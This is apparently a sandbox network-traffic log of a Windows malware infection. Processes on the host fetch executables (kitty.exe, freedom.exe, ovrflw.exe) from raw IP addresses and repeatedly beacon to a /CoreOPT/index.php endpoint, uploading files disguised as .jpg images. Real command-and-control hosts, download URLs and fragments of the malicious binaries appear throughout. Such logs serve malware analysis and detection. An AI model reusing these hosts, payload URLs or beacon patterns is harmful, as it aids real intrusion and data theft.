Aug 31, 2024 22:42:02.202740908 CEST	53	OUT	GET /inc/kitty.exe HTTP/1.1 Host: 185.215.113.16
Aug 31, 2024 22:42:02.959942102 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:02 GMT Content-Type: application/octet-stream Content-Length: 327168 Last-Modified: Wed, 07 Aug 2024 22:38:53 GMT Connection: keep-alive ETag: "66b3f77d-4fe00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 82 0a 9e b7 c6 6b f0 e4 c6 6b f0 e4 c6 6b f0 e4 d2 00 f3 e5 cb 6b f0 e4 d2 00 f5 e5 68 6b f0 e4 d2 00 f4 e5 d0 6b f0 e4 d2 00 f6 e5 c7 6b f0 e4 94 1e f4 e5 d7 6b f0 e4 94 1e f3 e5 d2 6b f0 e4 94 1e f5 e5 95 6b f0 e4 d2 00 f1 e5 d7 6b f0 e4 c6 6b f1 e4 7c 6b f0 e4 0c 1e f5 e5 cf 6b f0 e4 0c 1e f2 e5 c7 6b f0 e4 52 69 63 68 c6 6b f0 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a9 47 a0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 b8 03 00 00 52 01 00 00 00 00 00 4b 00 02 00 00 10 00 00 00 d0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$kkkkhkkkkkkkk\|kkkRichkPELGfRK@@@4)8@.text `.rdata@@.data"@.reloc)*@B
Aug 31, 2024 22:42:02.959953070 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 d0 f2 44 00 e8 2f d6 01 00 68 7b c7 43 00 e8 7d f2 01 00 59 c3 68 8f c7 43 00 Data Ascii: D/h{C}YhCqYhCeYjjhDDhCFYVWj1YD{jVDC7hCY_^DDhCYtDhCY
Aug 31, 2024 22:42:02.959964037 CEST	328	IN	Data Raw: e8 6e 04 00 00 83 c4 08 83 78 14 10 8b 50 10 72 02 8b 00 83 7d f8 10 8d 4d e4 57 0f 43 4d e4 bb 01 00 00 00 52 50 6a 00 ff 75 f4 51 e8 02 fc ff ff 83 c4 14 83 f8 ff 0f 85 51 02 00 00 8d 45 b0 68 e8 d2 43 00 50 e8 28 04 00 00 83 c4 08 83 78 14 10 Data Ascii: nxPr}MWCMRPjuQQEhCP(xPr}MRCMPjuQEhCPxPr}MuCMRPjVQwE]MCF+PjwSs
Aug 31, 2024 22:42:02.960032940 CEST	1236	IN	Data Raw: 8b f8 83 c4 0c 85 ff 75 b2 eb 13 2b fb bb 07 00 00 00 83 ff ff 0f 85 2b 01 00 00 8b 75 f4 8b 45 f8 8b 4d e4 83 f8 10 8d 5d e4 0f 43 d9 83 fe 18 72 54 8d 46 e9 03 c3 2b c3 50 6a 43 53 e8 d9 f4 01 00 8b f8 83 c4 0c 85 ff 74 38 8b cf ba 10 d3 43 00 Data Ascii: u++uEM]CrTF+PjCSt8C@;s+uE]C]F+PjCSrD,C@;usff;tKEG+PjCW
Aug 31, 2024 22:42:02.960043907 CEST	1236	IN	Data Raw: 85 f6 0f 85 a4 00 00 00 eb 02 33 f6 38 59 14 74 10 e8 eb cd 01 00 3b 78 0c 73 0e 8b 40 08 8b 34 b8 85 f6 0f 85 83 00 00 00 8b 45 f8 85 c0 74 13 8d 4d f4 8b f0 e8 cb cb 01 00 5f 8b c6 5e 5b 8b e5 5d c3 6a 08 e8 99 e0 01 00 8b f0 83 c4 04 85 f6 74 Data Ascii: 38Yt;xs@4EtM_^[]jt4EHtAuAdCPM@^<C3tMV9R5DMQ_^[]UPSVW3MS]=DDEu/WM
Aug 31, 2024 22:42:02.960056067 CEST	328	IN	Data Raw: 83 c4 04 89 43 04 eb 02 33 db 8b 45 08 89 5e 30 89 46 38 c7 46 3c 00 00 00 00 8b 5b 04 8b cb 89 5d fc 8b 03 ff 50 04 8d 45 f8 50 e8 c3 fb ff ff 83 c4 04 8b c8 8b 10 6a 20 8b 52 20 ff d2 88 45 13 85 db 74 16 8b 13 8b cb ff 52 08 85 c0 74 08 8b 10 Data Ascii: C3E^0F8F<[]PEPj R EtRtjE~8F@uFNF#u}tV,^[_]tC$C<CDEjPkMPVh`DEP0UVj3
Aug 31, 2024 22:42:02.960066080 CEST	1236	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 50 53 56 57 8b 7d 10 8b d9 83 7f 14 10 8b 47 10 89 45 10 72 02 8b 3f 83 f8 10 73 1d 8b 75 0c 89 45 f0 c7 45 f4 0f 00 00 00 0f 10 07 8b 7d 08 0f 11 45 e0 85 c0 74 4d eb 3c 8b f0 8d 4d e0 b8 ff ff ff Data Ascii: UPSVW}GEr?suEE}EtM<M;GFPMAEQWPhE}uuEjhTCM'MWQP}EuCEMPUr,MBrI#+RQMM
Aug 31, 2024 22:42:02.960124016 CEST	224	IN	Data Raw: 8b 46 2c 89 10 5f 80 7e 48 00 74 07 8b ce e8 c4 0e 00 00 c7 06 ac d4 43 00 8b 76 34 85 f6 74 23 8b 4e 04 85 c9 74 11 8b 01 ff 50 08 85 c0 74 08 8b 10 8b c8 6a 01 ff 12 6a 08 56 e8 e3 d5 01 00 83 c4 08 5e c3 cc cc 56 8b f1 56 e8 12 c4 01 00 8b 46 Data Ascii: F,_~HtCv4t#NtPtjjV^VVF,tPF,F$tPF$FtPFFtPFFtPFFtP{F^
Aug 31, 2024 22:42:02.960134983 CEST	1236	IN	Data Raw: e9 30 c0 01 00 cc cc 8b 01 56 8d 71 68 8b 40 04 c7 44 30 98 2c d5 43 00 8b 46 98 8b 48 04 8d 41 98 89 44 31 94 8d 4e 9c e8 ca fe ff ff 8b 46 98 56 8b 40 04 c7 44 30 98 9c d4 43 00 8b 46 98 8b 48 04 8d 41 f8 89 44 31 94 c7 06 08 d4 43 00 e8 e4 c6 Data Ascii: 0Vqh@D0,CFHAD1NFV@D0CFHAD1C^+Iv+IUVuEtjXV^]UVVCEtjHVy^]UVFW~N@D0,C
Aug 31, 2024 22:42:02.960171938 CEST	104	IN	Data Raw: 00 00 00 c7 45 f4 00 00 00 00 8d 51 02 c7 45 f8 07 00 00 00 66 8b 01 83 c1 02 66 85 c0 75 f5 2b ca 8d 45 a8 d1 f9 51 50 8d 4d e4 e8 63 07 00 00 83 7d f8 08 8d 45 e4 6a 00 0f 43 45 e4 6a 00 6a 00 6a 01 50 ff 15 d8 d1 43 00 8b 55 f8 8b d8 83 fa 08 Data Ascii: EQEffu+EQPMc}EjCEjjjPCUr2MUr
Aug 31, 2024 22:42:02.965915918 CEST	1236	IN	Data Raw: 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 94 01 00 00 52 51 e8 ec cf 01 00 83 c4 08 33 c0 c7 45 f4 00 00 00 00 c7 45 f8 07 00 00 00 66 89 45 e4 85 db 75 09 5e 8d 43 01 5b 8b e5 5d c3 8b 45 08 83 78 14 10 72 02 8b 00 57 6a 00 68 00 00 00 84 Data Ascii: I#+RQ3EEfEu^C[]ExrWjhjjPSCuSCG_^[]Exrjj@j Pi@,CHA@t%5CWS_^[]E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:04.370358944 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAzMjU1 Host: 185.215.113.19 Content-Length: 103407 Cache-Control: no-cache
Aug 31, 2024 22:42:04.370448112 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 7a 4d 6a 55 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAzMjU1Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:04.370448112 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:04.370496035 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:04.370496035 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:04.370728970 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:04.370728970 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:04.370793104 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:04.370793104 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:04.370825052 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:04.370825052 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:06.697525978 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:04.587296963 CEST	183	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 36 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000268001&unit=246122658369
Aug 31, 2024 22:42:05.450602055 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:06.963633060 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAwNDg5 Host: 185.215.113.19 Content-Length: 100641 Cache-Control: no-cache
Aug 31, 2024 22:42:06.963692904 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 77 4e 44 67 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAwNDg5Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:06.963692904 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:06.963731050 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:06.963731050 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:06.963840961 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:06.963901043 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:06.963921070 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:06.963948011 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:06.963948011 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:06.964018106 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:08.570391893 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49747	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:07.832092047 CEST	183	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 31 3d 31 30 30 30 32 37 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000271001&unit=246122658369
Aug 31, 2024 22:42:08.730628014 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49749	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:09.000238895 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAxMDUx Host: 185.215.113.19 Content-Length: 101203 Cache-Control: no-cache
Aug 31, 2024 22:42:09.000284910 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 78 4d 44 55 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAxMDUxContent-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:09.000315905 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:09.000329018 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:09.000358105 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:09.000380039 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:09.000396967 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:09.000423908 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:09.000435114 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:09.000457048 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:09.000468016 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:10.493772984 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49750	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:10.429280043 CEST	183	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 31 3d 31 30 30 30 32 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000272001&unit=246122658369
Aug 31, 2024 22:42:11.286216974 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49751	185.216.214.225	80	8176	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:10.476530075 CEST	120	OUT	GET /freedom.exe HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: 185.216.214.225 Cache-Control: no-cache
Aug 31, 2024 22:42:11.098258972 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 08 Aug 2024 03:39:14 GMT ETag: "17800-61f23c5420f4f" Accept-Ranges: bytes Content-Length: 96256 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a6 3d b4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 6e 01 00 00 08 00 00 00 00 00 00 2e 8d 01 00 00 20 00 00 00 a0 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 8c 01 00 4f 00 00 00 00 a0 01 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=fn. @ @O H.text4m n `.rsrcp@@.relocv@BHgH%&(rp (rCpssssrgp* ghrp rr/p rp p{rp* ?((rp* rp S(+-(,,+(-,+(,+(),(Z"(+"(+&(9&++5sk 'ol(,~-(b(T~om&-rap rp y4r)p E/rprprUprp*
Aug 31, 2024 22:42:11.098273039 CEST	1236	IN	Data Raw: 20 ee cd 27 04 2a 1a 72 1d 0d 00 70 2a 1a 20 84 2b 75 01 2a 1a 72 81 0d 00 70 2a 1a 20 44 18 b7 00 2a 1a 72 e5 0d 00 70 2a 1a 20 fa b3 e9 02 2a 1a 72 49 0e 00 70 2a 1a 20 09 8d 39 05 2a 1a 72 ad 0e 00 70 2a 1a 72 11 0f 00 70 2a 1a 72 75 0f 00 70 Data Ascii: 'rp +urp Drp rIp 9rprprup {rp Jjsn~"(d+:t(_+rCp* mrp =rp \rop
Aug 31, 2024 22:42:11.098283052 CEST	1236	IN	Data Raw: 1a 20 5f 89 45 02 2a 1a 72 f7 3f 00 70 2a 1a 20 a6 a3 ab 04 2a 1a 72 80 40 00 70 2a 1a 20 ad ba 69 03 2a 62 7e 41 00 00 04 2c 10 7e 41 00 00 04 6f 54 01 00 0a 14 80 41 00 00 04 2a 1a 72 38 44 00 70 2a 1a 72 c1 44 00 70 2a 1a 20 4d fa 04 03 2a 1a Data Ascii: _Er?p r@p ib~A,~AoTAr8DprDp MrJEprEpr\FprFp* rnGprGp* RTrHprIprRJprKprKprLprvMp \|r?Np srOp hrOprPprcQp
Aug 31, 2024 22:42:11.098329067 CEST	1236	IN	Data Raw: 28 3b 00 00 0a de 0f 25 28 2f 00 00 0a 13 07 28 31 00 00 0a de 00 72 55 06 00 70 73 3c 00 00 0a 13 09 11 09 17 6f 3d 00 00 0a 28 59 00 00 06 28 3e 00 00 0a 2c 46 11 09 1b 8d 36 00 00 01 13 0e 11 0e 16 72 6f 06 00 70 a2 11 0e 17 7e 0f 00 00 04 28 Data Ascii: (;%(/(1rUps<o=(Y(>,F6rop~(?rprp(@oA+D6rp~(?rprp(@oA(BoC%(/(1(oDoEr#
Aug 31, 2024 22:42:11.098339081 CEST	1236	IN	Data Raw: 00 00 01 6f 62 00 00 0a 13 05 38 b6 00 00 00 11 05 6f 63 00 00 0a 28 22 00 00 0a 0c 08 17 8d 03 00 00 01 13 06 11 06 16 72 c3 09 00 70 a2 11 06 14 28 64 00 00 0a 6f 26 00 00 0a 6f 60 00 00 0a 13 04 11 04 72 dd 09 00 70 16 28 65 00 00 0a 16 33 32 Data Ascii: ob8oc("rp(do&o`rp(e32rp(do&ofrpo],+r%po],+-rp(do&r3p(e3Xog:>uR,uRoh,tR
Aug 31, 2024 22:42:11.098356962 CEST	1236	IN	Data Raw: 00 00 0a a2 09 1d 28 80 00 00 0a 6f 81 00 00 0a 72 5b 10 00 70 72 75 10 00 70 6f 7f 00 00 0a 72 7b 10 00 70 28 2b 00 00 0a a2 09 1e 28 82 00 00 0a 0c 12 02 28 83 00 00 0a 72 7f 10 00 70 72 8b 10 00 70 6f 7f 00 00 0a 72 97 10 00 70 72 a1 10 00 70 Data Ascii: (or[prupor{p(+((rprporprpo~("~~("(W~("(X~("(Y~("(G~("(\~("
Aug 31, 2024 22:42:11.098366976 CEST	1236	IN	Data Raw: 01 28 9f 00 00 0a 28 a0 00 00 0a b9 0b 07 20 00 00 00 40 6a 31 32 07 6c 23 00 00 00 00 00 00 d0 41 5b 13 04 12 04 28 a1 00 00 0a 0c 08 1a 08 6f 94 00 00 0a 1a da 6f a2 00 00 0a 72 17 12 00 70 28 2b 00 00 0a 0c 2b 39 07 20 00 00 10 00 6a 31 30 07 Data Ascii: (( @j12l#A[(oorp(++9 j10l#0A[(oorp(+%(/rp(1(1*70~-8~o>V~j@~
Aug 31, 2024 22:42:11.098378897 CEST	1236	IN	Data Raw: 0a de 00 28 b7 00 00 0a 2a 00 00 01 34 00 00 00 00 07 00 12 19 00 0e 37 00 00 01 00 00 2e 00 12 40 00 0e 37 00 00 01 00 00 55 00 1c 71 00 0e 37 00 00 01 00 00 86 00 1c a2 00 0e 37 00 00 01 1b 30 02 00 29 00 00 00 00 00 00 00 7e 20 00 00 04 2c 13 Data Ascii: (47.@7Uq770)~ ,~,~(/(170]~,E6r7p~(>~~?(@(` (%(/(1*
Aug 31, 2024 22:42:11.098388910 CEST	1236	IN	Data Raw: 38 e7 03 00 00 11 13 72 de 1d 00 70 16 28 65 00 00 0a 16 33 62 1f 25 28 48 00 00 0a 72 ea 1d 00 70 28 2b 00 00 0a 13 07 72 de 1d 00 70 7e 21 00 00 04 28 c6 00 00 0a 28 41 01 00 06 28 c6 00 00 0a 7e 21 00 00 04 28 c6 00 00 0a 11 07 28 c6 00 00 0a Data Ascii: 8rp(e3b%(Hrp(+rp~!((A(~!((~!((((-(`8urp(e@(rp~!((A(~!(r0p((-(`H%(/r^p~!((A(~!
Aug 31, 2024 22:42:11.098402023 CEST	1236	IN	Data Raw: 00 00 00 b3 07 00 00 b3 07 00 00 1b 00 00 00 37 00 00 01 1b 30 0a 00 3a 05 00 00 21 00 00 11 28 dd 00 00 0a 02 6f de 00 00 0a 6f df 00 00 0a 13 05 16 13 04 38 ef 04 00 00 11 05 11 04 9a 0a 06 6f e0 00 00 0a 72 28 1f 00 70 16 28 65 00 00 0a 16 40 Data Ascii: 70:!(oo8or(p(e@o8rp(Kr6p(,er>p~~~~(A(N&j8
Aug 31, 2024 22:42:11.103221893 CEST	1236	IN	Data Raw: 00 00 01 13 08 11 08 16 14 a2 11 08 17 17 8d 03 00 00 01 13 09 11 09 16 28 41 01 00 06 a2 11 09 a2 11 08 14 14 14 28 4b 00 00 0a 28 2d 00 00 0a 28 95 00 00 06 16 80 23 00 00 04 de 47 11 06 17 d6 13 06 11 06 11 07 8e b7 3f 44 fb ff ff 11 04 17 d6 Data Ascii: (A(K(-(#G?D?#%(/rpo(+((1A#700rp~!(((-(`%(/(1!!70

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49752	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:10.732733011 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAyMTQ0 Host: 185.215.113.19 Content-Length: 102296 Cache-Control: no-cache
Aug 31, 2024 22:42:10.732733011 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 79 4d 54 51 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAyMTQ0Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:10.732811928 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:10.732812881 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:10.732889891 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:10.732889891 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:10.732889891 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:10.732889891 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:10.732889891 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:10.732889891 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:10.733087063 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:12.552313089 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49753	185.215.113.16	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:11.645771027 CEST	54	OUT	GET /inc/ovrflw.exe HTTP/1.1 Host: 185.215.113.16
